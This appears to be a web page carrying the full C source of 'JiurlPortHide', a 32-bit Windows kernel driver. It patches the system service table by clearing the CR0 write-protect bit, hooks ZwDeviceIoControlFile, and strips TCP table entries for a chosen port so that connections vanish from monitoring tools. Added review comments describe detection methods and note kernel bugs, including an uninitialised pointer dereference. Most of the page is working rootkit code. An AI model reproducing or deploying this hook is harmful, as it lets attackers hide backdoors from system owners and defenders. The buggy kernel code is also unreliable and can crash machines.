// jiurl // from tcpioctl.h tdiinfo.h tdistat.h<br>
// Definitions the driver needs in order to recognise TCP table queries; per the<br>
// author's note above they are copied from tcpioctl.h, tdiinfo.h and tdistat.h.<br>
// Control code that NewZwDeviceIoControlFile compares IoControlCode against.<br>
#define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003<br>
<br>
//* Structure of an entity ID.<br>
typedef struct TDIEntityID {<br>
ULONG tei_entity;<br>
ULONG tei_instance;<br>
} TDIEntityID;<br>
<br>
//* Structure of an object ID.<br>
// The hook compares the first sizeof(TDIObjectID) bytes of the caller's input<br>
// buffer against a value of this type.<br>
typedef struct TDIObjectID {<br>
TDIEntityID toi_entity;<br>
ULONG toi_class;<br>
ULONG toi_type;<br>
ULONG toi_id;<br>
} TDIObjectID;<br>
<br>
// Size in bytes of the Context member below.<br>
#define CONTEXT_SIZE 16<br>
//<br>
// QueryInformationEx IOCTL. The return buffer is passed as the OutputBuffer<br>
// in the DeviceIoControl request. This structure is passed as the<br>
// InputBuffer.<br>
//<br>
struct tcp_request_query_information_ex {<br>
TDIObjectID ID; // object ID to query.<br>
ULONG_PTR Context[CONTEXT_SIZE/sizeof(ULONG_PTR)]; // multi-request context.
Zeroed<br>
// for the first request.<br>
};<br>
<br>
typedef struct tcp_request_query_information_ex<br>
TCP_REQUEST_QUERY_INFORMATION_EX,<br>
*PTCP_REQUEST_QUERY_INFORMATION_EX;<br>
<br>
// Field values NewZwDeviceIoControlFile stores in a TDIObjectID (entity, class<br>
// and type respectively) to identify a TCP address-table query.<br>
#define CO_TL_ENTITY 0x400<br>
#define INFO_CLASS_PROTOCOL 0x200<br>
#define INFO_TYPE_PROVIDER 0x100<br>
</span><p>#if 0
//================================================================<br>
Copyright (c) JIURL, All Rights Reserved<br>
========================================================================<br>
<br>
/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/<br>
<br>
Module Name:<br>
<br>
JiurlPortHide.cpp<br>
<br>
About:<br>
<br>
- 这个驱动项目由一个我写的 AppWizard 创建。<br>
<br>
[ HomePage ] http://jiurl.yeah.net<br>
~~~~~~~~~~~~~~~~~~~~~<br>
[ Email ] jiurl@mail.china.com<br>
~~~~~~~~~~~~~~~~~~~~<br>
[ Forum ] http://jiurl.cosoft.org.cn/forum/index.php<br>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br>
<br>
- 有偿定制 AppWizard ,请发邮件联系 。<br>
<br>
/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/<br>
#endif<br>
<br>
<br>
#ifdef __cplusplus<br>
extern "C"<br>
{<br>
#endif<br>
<br>
#include <ntddk.h><br>
<br>
#include "JiurlPortHide.h"<br>
#include "Jiurl_tcpioctl.h"<br>
<br>
#ifdef __cplusplus<br>
}<br>
#endif<br>
<br>
// DriverEntry: driver initialisation routine. It registers DriverDispatch for<br>
// IRP_MJ_CREATE/IRP_MJ_CLOSE and DriverUnload as the unload routine, then replaces<br>
// the system service table entry for ZwDeviceIoControlFile with<br>
// NewZwDeviceIoControlFile (an SSDT hook). RegistryPath is not used.<br>
// Returns STATUS_SUCCESS unconditionally.<br>
//<br>
// NOTE(review), defensive context: once this has run, that ServiceTableBase slot<br>
// points into this driver instead of the kernel image. Integrity checks that compare<br>
// every service table entry with the kernel image's address range flag this change.<br>
// The inline _asm blocks and the (ULONG) cast of a function pointer tie the code to<br>
// 32-bit x86; 64-bit Windows enforces Kernel Patch Protection, which bug-checks when<br>
// the service table is modified.<br>
NTSTATUS <br>
DriverEntry(IN PDRIVER_OBJECT DriverObject,<br>
IN PUNICODE_STRING RegistryPath)<br>
{<br>
DbgPrint("JiurlPortHide: Hello,This is DriverEntry!\n");<br>
<br>
// Create and close requests share one handler; no other major function is set here.<br>
DriverObject->MajorFunction[IRP_MJ_CREATE] = <br>
DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverDispatch; <br>
DriverObject->DriverUnload = DriverUnload; <br>
<br>
// Save the original handler so the hook can forward to it and unload can restore it.<br>
// The table index is the ULONG read at byte offset 1 of the ZwDeviceIoControlFile<br>
// stub; presumably the service number encoded in the stub's first instruction on<br>
// x86 - confirm for the build being analysed.<br>
OldZwDeviceIoControlFile = (ZWDEVICEIOCONTROLFILE)(KeServiceDescriptorTable.ServiceTableBase[
*(PULONG)((PUCHAR)ZwDeviceIoControlFile+1)]);<br>
<br>
// The service table is written with CR0.WP cleared. CLI and CR0 act only on the<br>
// processor executing this code; other processors are not held off.<br>
_asm<br>
{<br>
CLI //disable interrupts on the current processor<br>
MOV EAX, CR0 //move CR0 register into EAX<br>
AND EAX, NOT 10000H //clear the WP bit (bit 16) so ring-0 writes ignore page write protection<br>
MOV CR0, EAX //write register back<br>
}<br>
<br>
// Overwrite the table slot with the address of the replacement routine.<br>
(KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)ZwDeviceIoControlFile+1)])
= (ULONG)NewZwDeviceIoControlFile;<br>
<br>
_asm <br>
{<br>
MOV EAX, CR0 //move CR0 register into EAX<br>
OR EAX, 10000H //set the WP bit again<br>
MOV CR0, EAX //write register back <br>
STI //re-enable interrupts<br>
}<br>
<br>
return STATUS_SUCCESS;<br>
}<br>
<br>
// DriverDispatch: handler DriverEntry registers for IRP_MJ_CREATE and IRP_MJ_CLOSE.<br>
// It completes every request with STATUS_SUCCESS and does nothing else;<br>
// DeviceObject is not used.<br>
NTSTATUS<br>
DriverDispatch(<br>
IN PDEVICE_OBJECT DeviceObject,<br>
IN PIRP Irp<br>
)<br>
{<br>
Irp->IoStatus.Status = STATUS_SUCCESS;<br>
IoCompleteRequest (Irp,IO_NO_INCREMENT);<br>
// NOTE(review): the IRP is read after IoCompleteRequest. A completed IRP no longer<br>
// belongs to the driver and may already have been freed, so this is a potential<br>
// use-after-free in kernel mode.<br>
return Irp->IoStatus.Status;<br>
}<br>
<br>
// DriverUnload: unload routine. It writes the saved OldZwDeviceIoControlFile back<br>
// into the ZwDeviceIoControlFile service table slot, using the same CR0.WP<br>
// toggling as DriverEntry. DriverObject is not used.<br>
//<br>
// NOTE(review), defensive context: after unload the table entry holds the original<br>
// value again, so a service-table integrity check only shows the hook while the<br>
// driver is loaded.<br>
void DriverUnload(IN PDRIVER_OBJECT DriverObject)<br>
{<br>
DbgPrint("JiurlPortHide: Bye,This is DriverUnload!\n");<br>
<br>
_asm<br>
{<br>
CLI //disable interrupts on the current processor<br>
MOV EAX, CR0 //move CR0 register into EAX<br>
AND EAX, NOT 10000H //clear the WP bit (bit 16) so ring-0 writes ignore page write protection<br>
MOV CR0, EAX //write register back<br>
}<br>
<br>
// Restore the original service routine address saved by DriverEntry.<br>
(KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)ZwDeviceIoControlFile+1)])
= (ULONG)OldZwDeviceIoControlFile;<br>
<br>
_asm <br>
{<br>
MOV EAX, CR0 //move CR0 register into EAX<br>
OR EAX, 10000H //set the WP bit again<br>
MOV CR0, EAX //write register back <br>
STI //re-enable interrupts<br>
}<br>
}<br>
<br>
// NewZwDeviceIoControlFile: replacement that DriverEntry installs in the service<br>
// table for ZwDeviceIoControlFile. Every call is forwarded unchanged to the saved<br>
// original. For a successful IOCTL_TCP_QUERY_INFORMATION_EX request whose object ID<br>
// matches the TCP address table (basic or extended form), every entry whose local<br>
// port equals PORTHIDE is deleted from the caller's output buffer and<br>
// IoStatusBlock->Information is reduced to match.<br>
// Parameters mirror the hooked service; the return value is always the status<br>
// returned by the original routine.<br>
//<br>
// NOTE(review), defensive context: callers that enumerate TCP endpoints through this<br>
// IOCTL receive a filtered table, so their view disagrees with any view that does<br>
// not pass through the hooked service (for example traffic observed off-host).<br>
// Cross-view comparison and service-table integrity checks are the relevant detections.<br>
// NOTE(review): InputBuffer, OutputBuffer and IoStatusBlock are dereferenced exactly<br>
// as the caller passed them; no NULL, length or access check and no exception<br>
// handling is visible here, so a malformed request can fault in kernel mode.<br>
NTSTATUS NewZwDeviceIoControlFile(<br>
IN HANDLE FileHandle,<br>
IN HANDLE Event OPTIONAL,<br>
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,<br>
IN PVOID ApcContext OPTIONAL,<br>
OUT PIO_STATUS_BLOCK IoStatusBlock,<br>
IN ULONG IoControlCode,<br>
IN PVOID InputBuffer OPTIONAL,<br>
IN ULONG InputBufferLength,<br>
OUT PVOID OutputBuffer OPTIONAL,<br>
IN ULONG OutputBufferLength<br>
)<br>
{<br>
NTSTATUS rc;<br>
<br>
// Let the real service run first; filtering happens on its finished output.<br>
rc = ((ZWDEVICEIOCONTROLFILE)(OldZwDeviceIoControlFile)) (<br>
FileHandle,<br>
Event,<br>
ApcRoutine,<br>
ApcContext,<br>
IoStatusBlock,<br>
IoControlCode,<br>
InputBuffer,<br>
InputBufferLength,<br>
OutputBuffer,<br>
OutputBufferLength<br>
);<br>
<br>
// Any other control code passes through untouched.<br>
if(IoControlCode != IOCTL_TCP_QUERY_INFORMATION_EX)<br>
{<br>
return(rc); <br>
}<br>
<br>
TCP_REQUEST_QUERY_INFORMATION_EX req;<br>
TCPAddrEntry* TcpTable;<br>
TCPAddrExEntry* TcpExTable;<br>
ULONG numconn;<br>
LONG i;<br>
<br>
DbgPrint("JiurlPortHide: IOCTL_TCP_QUERY_INFORMATION_EX\n");<br>
<br>
if( NT_SUCCESS( rc ) ) <br>
{<br>
// Build the object ID of a TCP address-table query to compare against the request.<br>
req.ID.toi_entity.tei_entity = CO_TL_ENTITY;<br>
req.ID.toi_entity.tei_instance = 0;<br>
req.ID.toi_class = INFO_CLASS_PROTOCOL;<br>
req.ID.toi_type = INFO_TYPE_PROVIDER;<br>
req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_ID;<br>
<br>
// Only the leading TDIObjectID is compared; InputBufferLength is not consulted.<br>
if( !memcmp( InputBuffer, &req, sizeof(TDIObjectID) ) )<br>
{<br>
// Entry count is derived from the byte count the original call reported.<br>
numconn = IoStatusBlock->Information/sizeof(TCPAddrEntry);<br>
TcpTable = (TCPAddrEntry*)OutputBuffer;<br>
<br>
for( i=0; i<numconn; i++ )<br>
{<br>
if( ntohs(TcpTable[i].tae_ConnLocalPort) == PORTHIDE )<br>
{<br>
DbgPrint("JiurlPortHide: HidePort %d\n", ntohs(TcpTable[i].tae_ConnLocalPort));<br>
<br>
// Shift the remaining entries down over the matched one. Source and destination<br>
// overlap, for which memcpy's behaviour is undefined.<br>
memcpy( (TcpTable+i), (TcpTable+i+1), ((numconn-i-1)*sizeof(TCPAddrEntry))
);<br>
numconn--;<br>
// Step back so the loop's i++ re-examines the entry that moved into this slot.<br>
i--;<br>
}<br>
}<br>
<br>
// Report the shortened table length to the caller.<br>
IoStatusBlock->Information = numconn*sizeof(TCPAddrEntry);<br>
return(rc);<br>
}<br>
<br>
<br>
// Same comparison for the extended address table.<br>
req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_EX_ID;<br>
<br>
if( !memcmp( InputBuffer, &req, sizeof(TDIObjectID) ) )<br>
{<br>
numconn = IoStatusBlock->Information/sizeof(TCPAddrExEntry);<br>
TcpExTable = (TCPAddrExEntry*)OutputBuffer;<br>
<br>
for( i=0; i<numconn; i++ )<br>
{<br>
if( ntohs(TcpExTable[i].tae_ConnLocalPort) == PORTHIDE )<br>
{<br>
// NOTE(review): this log line reads through TcpTable, which is never assigned on<br>
// this path (only TcpExTable is): an uninitialised pointer dereference in kernel mode.<br>
DbgPrint("JiurlPortHide: HidePort %d\n",ntohs(TcpTable[i].tae_ConnLocalPort));<br>
<br>
// Overlapping copy, as in the basic-table branch.<br>
memcpy( (TcpExTable+i), (TcpExTable+i+1), ((numconn-i-1)*sizeof(TCPAddrExEntry))
);<br>
numconn--;<br>
// Step back so the loop's i++ re-examines the entry that moved into this slot.<br>
i--;<br>
}<br>
}<br>
<br>
IoStatusBlock->Information = numconn*sizeof(TCPAddrExEntry);<br>
return(rc);<br>
}<br>
}<br>
<br>
// Failed call or a different object ID: return the original result unmodified.<br>
return(rc);<br>
}<br>
<p> 下载源码及示例程序<p>
<br>
<b>完</b><br>
<br>
欢迎交流,欢迎交朋友,<br>
欢迎访问<br>
主页 <a href="http://jiurl.yeah.net" target="_blank">http://jiurl.yeah.net</a>
<a href="http://jiurl.nease.net/" target="_blank">http://jiurl.nease.net</a>
论坛 <a href="http://jiurl.cosoft.org.cn/forum" target="_blank">http://jiurl.cosoft.org.cn/forum</a>
<p>f啊k,不带你们这样的啊,有好事不叫我。<p>
<p>
</td>
</tr>
</table>
</div>
</body>
</html>